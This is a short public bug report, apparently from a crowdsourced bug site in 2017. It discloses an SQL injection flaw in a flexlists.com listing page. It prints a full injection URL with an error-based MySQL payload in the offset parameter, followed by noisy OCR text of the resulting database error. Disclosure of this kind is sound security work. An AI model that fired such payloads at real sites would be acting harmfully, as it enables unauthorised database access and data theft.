Bug on Flexlists - The flexlist website has a bug in filtering out data passed to it when listing data , its possible to pass arbitrary SQL queries to it. URL was too long for the title so here it is: https://flexlists.com/listdata.php?list_id=2424&pcid=&query=&offset=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)&num_items=50&sort=10699&dir=ASC



Domain: https://flexlists.com/listdata.php
Tweet Share

Reported on flexlists.com

Total # of issues reported = 1

Reported by alienwithin

Total Points of alienwithin = 6

Browser Version: 56.0.2924

Operating System: Windows

OS Version: 7

Bug Type: General
Status: open
Added on: March 1, 2017, 8:32 a.m.

Screenshot:



OCR Results:

(- c ‘ a Secure \ "ups/manmmm/wundampnp? offset 1%20uraszomsd196203nd%20(sELEcT%201%2cand%20k0W(1%2c1|>(sELEszocouNTmamcoNcATtCHAR(95)%2ccHAR(33)%2ccr c" I 242481pc‘d :ELquEry m. have an error in yaur SQL mm; (he(k the llama] that mmspunas to yaur nysm servzr version fur the right syntax m use "gar '4, 93' at line 1 lery: 5112(t ‘ rm. 7115:3424 mm (11:14;st 15 mm on ifieldjzwaai) urdzr by jimgassa Ax mm 71, 5e

Comments:

No comment added yet. Be the first to comment!